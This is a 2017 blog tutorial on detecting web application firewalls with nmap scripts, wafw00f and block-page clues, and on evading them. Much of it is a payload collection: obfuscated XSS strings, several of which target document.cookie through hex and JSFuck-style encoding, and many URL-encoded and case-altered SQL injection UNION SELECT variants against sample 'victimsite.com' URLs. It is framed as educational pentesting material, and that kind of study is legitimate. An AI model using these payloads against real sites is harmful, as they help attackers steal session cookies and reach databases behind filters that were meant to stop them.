Computer Security, Cross-site scripting, Technology, Tutorials, Web Security

Guide To Identifying And Bypassing WAFs

August 18, 2017

Introduction

In this tutorial, I’m gonna show you how to identify and bypass Web Application Firewalls (WAFs) deployed on web servers. Several payloads are utilized such as XSS and SQLi.

By the end of the article, you’ll acquire a better understanding of how to:

  • Identify The WAF
  • Why Identifying The WAF Is Essential For Pentesting
  • Different Operational Modes Of WAFs
  • Bypassing WAFs using payloads

NOTE: This article is for educational purposes only.

Let’s start this tutorial immediately!

Detecting/Fingerprinting The WAF (Identification In Reconnaissance Phase)

We can detect and fingerprint the WAF being used on the target’s site.

Using Nmap To Detect Web Application Firewall On Target’s Web Server

Execute the following commands in Terminal:

nmap –script=http-waf-fingerprint targethostname

nmap –script=http-waf-fingerprint –script-args http-waf-fingerprint.intensive=1 targethostname


Script Output
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-waf-fingerprint:
|   Detected WAF
|_    Cloudflare

——————————–

For a more intensive Nmap WAF fingerprint scan, use http-waf-fingerprint.intensive. When you deploy this parameter, the script will create WAF specific scans which ultimately consume more time. It is set off by default.

When you deploy the intensive parameter, the script will create WAF specific scans which ultimately consume more time. It is set off by default.

If the WAF’s port 80 does not indicate the ‘Detected WAF’ message, you can check for other ports via the Nmap WAF profiling tools.

The subsequent command in Terminal suffices:

nmap –script=http-waf-detect targethostname

————————-

PORT   STATE SERVICE REASON
8443/tcp open  http    syn-ack
| http-waf-detect:  IDS/IPS/WAF detected
|_targetsite.com:8443/?p4yl04d3=<script>alert(document.cookie)</script

—————————-

Other common ports that expose that a IDS/IPS/WAF is being used include: 443, 8000, 8008, 8080, 8088.

Whats nice about these Nmap scripts is that they may detect various IDS, IPS, and WAF products. The bonus is they work with many popular Web Application Firewalls such as ModSecurity and Blue Coat.

Profiling WAF using WAFw00f.py

Wafw00f python script is another tool for identifying typical patterns of more than 20 Web Application Firewalls:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

It’s easy to use, just input the following into terminal:

wafw00f http://www.targetsite.com

Problem With The Nmap Scripts (http-waf-fingerprint/detect) And Wafw00f

Sneaky WAFs will conceal their presence and identity from cookie values/HTTP responses.

What I suggest doing is performing additional tests. For instance, go to the target’s site, and attempt to manually probe for sensitive files like .htaccess. So like http://targetsite.com/.htaccess.

Obviously, you’re going to be blocked from accessing the files. But if a WAF has been implemented and enforced on the target’s site, the pen tester will be shown a web block page, and the WAF may identify itself through it like Cloudflare or Sucuri for example. Some WAFs like Cloudbric make it less obvious and do not reveal themselves directly on the blocked web page, and instead responds with an HTTP error. Do keep in mind that if you perform this kind of testing via the web browser to probe for a WAF, there will be an inevitable trail of evidence left in the WAF/web/server logs which indicates that someone has triggered the WAF’s protections. This is where the scripts earlier mentioned are much less likely to trigger WAFs and leave alerts in WAF logs.

Some WAFs do reveal themselves in their response, for example:

<title>dotDefender Blocked Your Request</title>

Some other ways to detect the exact WAF used for protecting a web application are:

Some WAF solutions will implement their own cookie. For instance, you’ll see something like “ns_af=” in the HTTP cookie which indicates that Citrix Netscaler is being deployed on the target’s web server.

A couple WAF solutions will alter the initial response header to baffle the hacker.

For example, Citrix Netscaler functions like this:

if self.matchheader((‘Cneonction’,‘close‘),attack=True:

     return True

if self.matchheader((‘nnCoection’,‘close‘),attack=True:

     return True

Why Identifying A WAF Is Important

Identifying A WAF is useful since it will not merely reveal the product being employed, but also clearly unveils the operation mode of the WAF. Whether the WAF is blacklisted-based, whitelisted-based, or hybrid-based is crucial reconnaissance for the attacker.

Different Operation Modes Of WAFs
Blacklist

Blacklist is reliant on an established database of known attack vectors. Obviously, Cross-site scripting strings like <script> and </script> will be well known by a blacklisted-based WAF.

Whitelist

In contrast, whitelist endorses a learning mode that builds a security policy of known “acceptable” HTTP traffic. Some people refer to this by using the terminology of “dynamic profiling.”

Hybrid (Blacklist + Whitelist Operation Modes Together)

A hybrid mode deploys both a blacklist and whitelist model. Typically, either the blacklist or whitelist is more prevalent.

How To Bypass WAFs

There are various methods for bypassing WAFs such as:

  • Utilize a set of payloads/bypasses: XSS, SQL
  • Use security tools such as the popular sqlmap
  • Regex Reversing

Obviously, the WAF vendors know about these bypass methods and will take measures to implement patches for discovered, reported attack vectors. The unreported, “0 day” sophisticated attack vectors can be an issue for the WAF and target’s site. Always remember that while a WAF can provide substantial web application protection, a determined adversary can very well evade and defeat the WAF.

Using Numerous Payloads And Bypasses

Using payloads is very common to bypass Web Application Firewalls. A WAF using blacklist is extremely susceptible. It’s the target’s job to ensure that their web application has no vulnerable code for the attacker to exploit.

Let’s warm up by starting the tutorial with the basic and then progress to more complicated WAF attack vectors (XSS, Hex Encoding, SQL WAF bypasses):

We can use a traditional XSS payload to bypass a WAF such as :<script>alert(1);</script>

Therefore: http://victimsite.com/index.php?search=<script>alert(1);</script>

This is a basic payload meant to convey the fundamental essence of WAF bypasses. Hence, unlikely to work on sophisticated, up-to-date WAFs but always important to remember.

A crafted URL Encoded/Hex Value Web Application Firewall bypass can look something like this:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3B%3C%2F%73%63%72%69%70%74%3E

OR we can use XSS like this:

<scr<script>ipt>alert(1)</scr<script>ipt>

HTML

Or if HTML is more of your style, go for something like this:

&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x
29;&#x3B;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;

As you can see, there are semicolons accompanied.

Also, utilize upper/lower case such as the following example:

&lt;/script&gt;&lt;scRiPt&gt;aLeRt(1);&lt;/script&gt;

Experimenting with a variety of payloads is essential for bypassing a WAF successfully.

Using XSS To Bypass A WAF In Detail

A more lengthier example relates to using a Cross-site scripting vulnerability to bypass a WAF which can be achieved by deploying JavaScript’s typical techniques to steal user information like eval() and alert(). Although an issue rises when most WAFs block the request right away when one of these techniques are discovered in a request.

One can insert the following into the browser’s console:

eval("aler"+(!![]+[])[+[]])("lol")

If we happened to be aware of the victim’s browser, we could employ non-standarized techniques to broaden the intrusion. This may result in a quicker bypass as the majority of non-standarized techniques are not absorbed by nearly all policies.

The core notion of bypassing a Web Application Firewall revolves around constructing requests semantically counterpart to a Cross-site scripting attack for instance, while simultaneously seeking to evade the security policies implemented.

Using Hex Encoding To Bypass WAF

Using hex encoding is an extremely viable and efficacious method for bypassing WAFs easily.

For example, you can obfuscate Cross-Site Scripting like this:

this[‘\x64\x6f\x63\x75\x6d’+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+’kie’]

OR

Something like this can be pretty good at bypassing and defeating WAFs:

this[\x64\x6f\x63\x75\x6d\x65\x6e\x74][\x63\x6f\x6f\x6b\x69\x65]

OR

document[\x63\x6f\x6f\x6b\x69\x65]

OR even

this[‘docum’+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+\x6b\x69\x65]

Always remember that when we modify our request just slightly may result in the WAF’s security mechanisms to be circumvented since the request can be neglected by the WAF. Therefore, a determined attacker can keep trying to bypass and penetrate the security mechanisms of a WAF.

Using Dom Based XSS To Bypass WAF

I’ve written a brief article on using Dom Based Cross-site scripting attacks to bypass WAFs here. Definitely, take a look at that, it is short and I provide some nice payloads that are used to modify a reflected XSS into a DOM based XSS vulnerability.

Using DOM Based XSS To Bypass WAF

Using Regex Reversing To Reverse Engineer A WAF

I’ve also written a brief detailed article on using regex reversing to reverse engineer a WAF here.

How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing

SQL Injection Bypass WAF

Obviously, the web server and web application utilize URL encoding. Hence, we can use URL encoding techniques to evade WAFs. We don’t really care if SQL fails to uphold URL encoding since our targets’ application and the server is vulnerable to the dangers of URL encoding which can potentially aid us to bypass WAFs frequently.

Lets take a look at some payloads:

unio%6e %73elect
union%2053elect
uni%6fn distinct%52OW s%65lect
%55nion %53eLEct
unio%6e%20%64istinc%74%20%73elect
union%20%64istinctRO%57%20select
%55nion(%53elect)
u%6eion se%6cect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
union%20distinct%20select
Use Hex URL Encoding

Try replacing some characters with hex url-encoded values.

http://www.victimsite.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

Some Web Application Firewalls implement additional protection by enforcing functions like prototype. We can exploit these functions and pwn the target’s web property using the following examples:

http://victimsite.com/products.php?product_id=–15+(uNioN+SeleCT)+…

http://victimsite.com/products.php?product_id=-15+(UnI)(oN)+(SeL)(ecT)+….

http://victimsite.com/products.php?product_id=–15+(uNioN)+(sElECt)….…

http://victimsite.com/products.php?product_id=-15+uni*on+sel*ect+1,2,3,4&#8230 ;

http://victimsite.com/products.php?product_id=-15+union (select 1,2,3,4…)

With particular emphasis on the fourth example, this bypass will largely depend on the kind of Web Application Firewall we are facing. If the WAF takes off the ‘*‘, the outcome will turn out to be ‘15+union+select….

Altering The Case Of The Letters And Using Comments To Bypass Web Application Firewalls

Let me reveal a useful tip for bypassing and avoiding detection by the majority of WAFs:

http://victimsite.com/products.php?product_id=–/*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

What I just did is basically alter the case of the letters and deploy comments to bypass the WAF. Thus, I integrated them together instead of merely using one technique to bypass the WAF which is less effective. If you solely used one method for evading the WAF, your request will likely be blocked.

Replacing Keywords To Bypass WAF

Clearly many WAFs will eliminate the ‘UNION SELECT’ SQL UNION statement when it is discovered in the URL. Therefore, we can bypass WAF by exploiting this security mechanism:

http://victimsite.com/products.php?product_id=15 UNIunionON SELselectECT 1,2,3,4….

The outcome will end up being ‘UNION SELECT‘ because both the ‘union‘ and ‘select‘ will be eliminated.

The aforementioned SQL will obviously not carry an impact on every firewall out there since some will exclude the “UNION” and “SELECT” commands when they are discovered.

Use Different Variations For SQL Injections

A lot of the inexperience pen testers stick with the traditional commands for SQL injections. It’s crucial to use other “variations of commands” such as concat_ws() and version().

Conclusion

I hope you enjoyed learning from this article. Have a great day!

You Might Also Like

Back to top
%d bloggers like this: